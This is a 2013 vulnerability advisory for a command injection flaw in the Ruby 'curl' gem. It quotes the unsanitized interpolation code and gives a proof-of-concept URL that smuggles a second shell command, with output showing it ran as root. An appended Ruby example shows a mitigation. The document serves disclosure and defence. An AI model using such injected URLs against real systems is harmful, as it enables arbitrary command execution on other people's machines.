Ruby Gem Curl Command Execution Vulnerability

2013-03-13T00:00:00
ID 1337DAY-ID-20506
Type zdt
Reporter Larry Cashdollar
Modified 2013-03-13T00:00:00

Description

Ruby Gem Curl suffers from a remote command execution vulnerability due to a lack of user input sanitization.

                                        
Curl Ruby Gem Remote command execution
3/12/2013

https://github.com/tg0/curl

Specially crafted URLs can result in remote code execution:

In ./lib/curl.rb the following lines interpolate the URL into a command string without sanitizing it:

    # lib/curl.rb, lines 131-135
    cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} #{ref}  \"#{url}\"  "
    if @debug
      puts cmd.red
    end
    # url (and ref) are interpolated unescaped into the command line that open_pipe runs
    result = open_pipe(cmd)

PoC:

page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")

[email protected]:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)

Larry W. Cashdollar
@_larry0
http://vapid.dhs.org
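
A mitigation for the string interpolation in lib/curl.rb, as an added example (not code from the advisory or from the gem): validate the URL, then pass curl an argument array so that no shell ever parses it. The names curl_argv, run_argv, echo_last_argument and SAMPLE_URL are hypothetical, and a child Ruby process stands in for curl so the example runs offline.

```ruby
require "open3"
require "rbconfig"
require "uri"

# Hypothetical helper, not part of the gem: accept only http(s) URLs and return
# the command as an argv array so that no shell ever parses the URL.
def curl_argv(url, options = [])
  uri = begin
    URI.parse(url)
  rescue URI::InvalidURIError
    nil # quotes, spaces and similar characters are not legal in a URI
  end
  # URI::HTTPS subclasses URI::HTTP; file://, relative and option-like input fail here.
  unless uri.is_a?(URI::HTTP) && !uri.host.to_s.empty?
    raise ArgumentError, "refusing URL: #{url.inspect}"
  end
  ["curl", "--silent", *options, "--", url] # "--" ends curl's option parsing
end

# Open3 called with several arguments execs the program directly (no /bin/sh),
# so each array element reaches the child as exactly one argument.
def run_argv(argv)
  output, status = Open3.capture2e(*argv)
  raise "#{argv.first} exited with #{status.exitstatus}" unless status.success?
  output
end

# Constructed sample: a syntactically valid URL can still carry ; & $( ),
# which is why validation alone is not enough and the argv form matters.
SAMPLE_URL = 'http://example.test/a;b&c=$(d)'

# Stand-in for curl so the example runs offline: a child Ruby process that
# prints back the last argument it received.
def echo_last_argument(value)
  run_argv([RbConfig.ruby, "-e", "print ARGV.last", value])
end

if __FILE__ == $PROGRAM_NAME
  p curl_argv(SAMPLE_URL)
  puts echo_last_argument(SAMPLE_URL)
end
```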
